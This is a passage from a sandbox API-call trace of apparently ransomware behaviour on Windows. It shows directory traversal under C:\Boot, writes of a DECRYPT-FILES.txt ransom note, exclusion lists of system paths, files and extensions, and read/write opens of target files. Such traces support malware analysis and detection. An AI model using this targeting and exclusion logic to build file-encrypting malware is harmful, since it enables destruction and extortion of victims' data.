returned 0xffffffff [0179.637] GetLastError () returned 0x5 [0179.637] lstrlenW (lpString="C:\\Boot\\nl-NL\\") returned 14 [0179.637] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.637] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\nl-NL\\\\DECRYPT-FILES.txt") returned 32 [0179.637] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\nl-nl\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.637] lstrlenW (lpString="C:\\Boot\\nl-NL\\") returned 14 [0179.637] lstrcatW (in: lpString1="C:\\Boot\\nl-NL\\", lpString2="*" | out: lpString1="C:\\Boot\\nl-NL\\*") returned="C:\\Boot\\nl-NL\\*" [0179.637] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6ba9ba0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ba9ba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479838 [0179.637] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.637] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6ba9ba0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ba9ba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.638] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.638] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.638] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.638] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0179.638] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0179.638] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0179.638] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0179.638] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0179.638] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0179.638] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0179.638] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0179.638] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0179.638] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0179.638] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.638] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0179.638] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0179.638] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0179.638] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0179.638] lstrlenW (lpString="C:\\Boot\\nl-NL\\") returned 14 [0179.638] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.638] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Boot\\nl-NL\\" | out: lpString1="C:\\Boot\\nl-NL\\") returned="C:\\Boot\\nl-NL\\" [0179.638] lstrcatW (in: lpString1="C:\\Boot\\nl-NL\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned="C:\\Boot\\nl-NL\\bootmgr.exe.mui" [0179.638] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.638] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.638] CloseHandle (hObject=0x0) returned 0 [0179.638] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.639] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6ba9ba0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6ba9ba0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ba9ba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.639] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.639] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6ba9ba0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6ba9ba0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ba9ba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0179.639] FindClose (in: hFindFile=0x479838 | out: hFindFile=0x479838) returned 1 [0179.639] CloseHandle (hObject=0xffffffff) returned 0 [0179.639] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6ba9ba0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ba9ba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0179.639] lstrcmpW (lpString1="pl-PL", lpString2=".") returned 1 [0179.639] lstrcmpW (lpString1="pl-PL", lpString2="..") returned 1 [0179.639] lstrcatW (in: lpString1="pl-PL", lpString2="\\" | out: lpString1="pl-PL\\") returned="pl-PL\\" [0179.639] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="pl-PL\\" | out: lpString1="C:\\Boot\\pl-PL\\") returned="C:\\Boot\\pl-PL\\" [0179.639] StrStrW (lpFirst="C:\\Boot\\pl-PL\\", lpSrch="\\Program Files") returned 0x0 [0179.639] StrStrW (lpFirst="C:\\Boot\\pl-PL\\", lpSrch=":\\Windows") returned 0x0 [0179.639] StrStrW (lpFirst="C:\\Boot\\pl-PL\\", lpSrch="\\Games\\") returned 0x0 [0179.639] StrStrW (lpFirst="C:\\Boot\\pl-PL\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.639] StrStrW (lpFirst="C:\\Boot\\pl-PL\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.639] StrStrW (lpFirst="C:\\Boot\\pl-PL\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.639] StrStrW (lpFirst="C:\\Boot\\pl-PL\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.639] StrStrW (lpFirst="C:\\Boot\\pl-PL\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.639] StrStrW (lpFirst="C:\\Boot\\pl-PL\\", lpSrch="\\All Users") returned 0x0 [0179.639] StrStrW (lpFirst="C:\\Boot\\pl-PL\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.639] StrStrW (lpFirst="C:\\Boot\\pl-PL\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.639] StrStrW (lpFirst="C:\\Boot\\pl-PL\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.639] StrStrW (lpFirst="C:\\Boot\\pl-PL\\", lpSrch="AhnLab") returned 0x0 [0179.639] StrStrW (lpFirst="C:\\Boot\\pl-PL\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.639] lstrlenW (lpString="C:\\Boot\\pl-PL\\") returned 14 [0179.639] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.639] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\pl-PL\\\\0a16c9.tmp") returned 25 [0179.640] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\\\0a16c9.tmp" (normalized: "c:\\boot\\pl-pl\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0179.640] GetLastError () returned 0x5 [0179.640] lstrlenW (lpString="C:\\Boot\\pl-PL\\") returned 14 [0179.640] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.640] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\pl-PL\\\\DECRYPT-FILES.txt") returned 32 [0179.640] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\pl-pl\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.640] lstrlenW (lpString="C:\\Boot\\pl-PL\\") returned 14 [0179.640] lstrcatW (in: lpString1="C:\\Boot\\pl-PL\\", lpString2="*" | out: lpString1="C:\\Boot\\pl-PL\\*") returned="C:\\Boot\\pl-PL\\*" [0179.640] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6ba9ba0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ba9ba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479838 [0179.640] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.640] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6ba9ba0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ba9ba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.640] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.640] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.640] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.640] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0179.640] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0179.640] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0179.640] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0179.640] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0179.640] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0179.640] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0179.640] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0179.640] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0179.641] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0179.641] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.641] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0179.641] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0179.641] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0179.641] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0179.641] lstrlenW (lpString="C:\\Boot\\pl-PL\\") returned 14 [0179.641] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.641] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Boot\\pl-PL\\" | out: lpString1="C:\\Boot\\pl-PL\\") returned="C:\\Boot\\pl-PL\\" [0179.641] lstrcatW (in: lpString1="C:\\Boot\\pl-PL\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned="C:\\Boot\\pl-PL\\bootmgr.exe.mui" [0179.641] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.641] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.642] CloseHandle (hObject=0x0) returned 0 [0179.642] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.643] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6ba9ba0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6ba9ba0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ba9ba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.643] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.643] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6ba9ba0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6ba9ba0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ba9ba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0179.643] FindClose (in: hFindFile=0x479838 | out: hFindFile=0x479838) returned 1 [0179.643] CloseHandle (hObject=0xffffffff) returned 0 [0179.643] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6ba9ba0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ba9ba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0179.643] lstrcmpW (lpString1="pt-BR", lpString2=".") returned 1 [0179.643] lstrcmpW (lpString1="pt-BR", lpString2="..") returned 1 [0179.643] lstrcatW (in: lpString1="pt-BR", lpString2="\\" | out: lpString1="pt-BR\\") returned="pt-BR\\" [0179.643] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="pt-BR\\" | out: lpString1="C:\\Boot\\pt-BR\\") returned="C:\\Boot\\pt-BR\\" [0179.643] StrStrW (lpFirst="C:\\Boot\\pt-BR\\", lpSrch="\\Program Files") returned 0x0 [0179.643] StrStrW (lpFirst="C:\\Boot\\pt-BR\\", lpSrch=":\\Windows") returned 0x0 [0179.643] StrStrW (lpFirst="C:\\Boot\\pt-BR\\", lpSrch="\\Games\\") returned 0x0 [0179.643] StrStrW (lpFirst="C:\\Boot\\pt-BR\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.643] StrStrW (lpFirst="C:\\Boot\\pt-BR\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.643] StrStrW (lpFirst="C:\\Boot\\pt-BR\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.644] StrStrW (lpFirst="C:\\Boot\\pt-BR\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.644] StrStrW (lpFirst="C:\\Boot\\pt-BR\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.644] StrStrW (lpFirst="C:\\Boot\\pt-BR\\", lpSrch="\\All Users") returned 0x0 [0179.644] StrStrW (lpFirst="C:\\Boot\\pt-BR\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.644] StrStrW (lpFirst="C:\\Boot\\pt-BR\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.644] StrStrW (lpFirst="C:\\Boot\\pt-BR\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.644] StrStrW (lpFirst="C:\\Boot\\pt-BR\\", lpSrch="AhnLab") returned 0x0 [0179.644] StrStrW (lpFirst="C:\\Boot\\pt-BR\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.644] lstrlenW (lpString="C:\\Boot\\pt-BR\\") returned 14 [0179.644] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.644] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\pt-BR\\\\0a16c9.tmp") returned 25 [0179.644] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\\\0a16c9.tmp" (normalized: "c:\\boot\\pt-br\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0179.644] GetLastError () returned 0x5 [0179.644] lstrlenW (lpString="C:\\Boot\\pt-BR\\") returned 14 [0179.644] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.644] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\pt-BR\\\\DECRYPT-FILES.txt") returned 32 [0179.644] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\pt-br\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.644] lstrlenW (lpString="C:\\Boot\\pt-BR\\") returned 14 [0179.644] lstrcatW (in: lpString1="C:\\Boot\\pt-BR\\", lpString2="*" | out: lpString1="C:\\Boot\\pt-BR\\*") returned="C:\\Boot\\pt-BR\\*" [0179.644] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6ba9ba0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ba9ba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479838 [0179.644] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.645] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6ba9ba0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ba9ba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.645] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.645] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.645] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.645] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0179.645] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0179.645] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0179.645] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0179.645] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0179.645] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0179.645] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0179.645] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0179.645] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0179.645] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0179.645] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.645] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0179.645] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0179.645] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0179.645] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0179.645] lstrlenW (lpString="C:\\Boot\\pt-BR\\") returned 14 [0179.645] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.645] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Boot\\pt-BR\\" | out: lpString1="C:\\Boot\\pt-BR\\") returned="C:\\Boot\\pt-BR\\" [0179.645] lstrcatW (in: lpString1="C:\\Boot\\pt-BR\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned="C:\\Boot\\pt-BR\\bootmgr.exe.mui" [0179.645] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.645] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.645] CloseHandle (hObject=0x0) returned 0 [0179.646] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.646] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6ba9ba0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6ba9ba0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ba9ba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.646] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.646] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6ba9ba0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6ba9ba0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ba9ba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0179.646] FindClose (in: hFindFile=0x479838 | out: hFindFile=0x479838) returned 1 [0179.648] CloseHandle (hObject=0xffffffff) returned 0 [0179.648] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6bcfd00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bcfd00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0179.648] lstrcmpW (lpString1="pt-PT", lpString2=".") returned 1 [0179.648] lstrcmpW (lpString1="pt-PT", lpString2="..") returned 1 [0179.648] lstrcatW (in: lpString1="pt-PT", lpString2="\\" | out: lpString1="pt-PT\\") returned="pt-PT\\" [0179.648] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="pt-PT\\" | out: lpString1="C:\\Boot\\pt-PT\\") returned="C:\\Boot\\pt-PT\\" [0179.648] StrStrW (lpFirst="C:\\Boot\\pt-PT\\", lpSrch="\\Program Files") returned 0x0 [0179.648] StrStrW (lpFirst="C:\\Boot\\pt-PT\\", lpSrch=":\\Windows") returned 0x0 [0179.648] StrStrW 